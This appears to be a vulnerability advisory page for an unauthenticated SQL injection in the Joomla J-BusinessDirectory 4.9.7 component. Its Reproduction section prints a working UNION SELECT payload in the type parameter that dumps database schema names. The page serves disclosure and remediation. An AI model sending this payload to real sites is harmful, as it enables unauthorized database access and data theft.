Joomla! Component J-BusinessDirectory 4.9.7 SQL Injection
Description
Joomla! Component J-BusinessDirectory 4.9.7 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the type parameter. Attackers can send GET requests to index.php with the option=com_jbusinessdirectory&task=categories.getCategories parameters and inject UNION-based SQL statements in the type parameter to extract database information including schema names and sensitive data.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
1- Range: =4.9.7
Patches
Vulnerability mechanics
Root cause
"Missing input validation on the `type` parameter allows UNION-based SQL injection."
Attack vector
An unauthenticated attacker sends a GET request to `index.php?option=com_jbusinessdirectory&task=categories.getCategories` with a malicious `type` parameter containing a UNION SELECT payload [ref_id=1]. The injected SQL extracts database schema names from `INFORMATION_SCHEMA.SCHEMATA`. No authentication or special privileges are required.
Affected code
The vulnerability resides in the `categories.getCategories` task of the J-BusinessDirectory component (version 4.9.7). The `type` parameter is passed directly into an SQL query without sanitization, allowing UNION-based injection.
What the fix does
The advisory does not include a patch diff. To remediate, the `type` parameter must be validated or parameterized before being used in SQL queries. Without a fix, any unauthenticated visitor can execute arbitrary SQL statements.
Preconditions
- configThe J-BusinessDirectory component (version 4.9.7) must be installed and enabled on the Joomla site.
- authNo authentication required; the vulnerable endpoint is publicly accessible.
- networkAttacker must be able to send HTTP GET requests to the Joomla instance.
- inputThe `type` GET parameter is user-controlled and unsanitized.
Reproduction
Send a GET request to `http://target/[PATH]/index.php?option=com_jbusinessdirectory&task=categories.getCategories&type=1%20union%20select%20(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),2--%20-&term=a` [ref_id=1]. The server responds with a JSON payload containing the database schema names.
Generated on Jun 20, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4- www.exploit-db.com/exploits/46230mitreexploit
- www.vulncheck.com/advisories/joomla-component-j-businessdirectory-sql-injectionmitrethird-party-advisory
- cmsjunkie.commitreproduct
- extensions.joomla.org/extensions/extension/directory-a-documentation/directory/j-businessdirectory/mitreproduct
News mentions
0No linked articles in our index yet.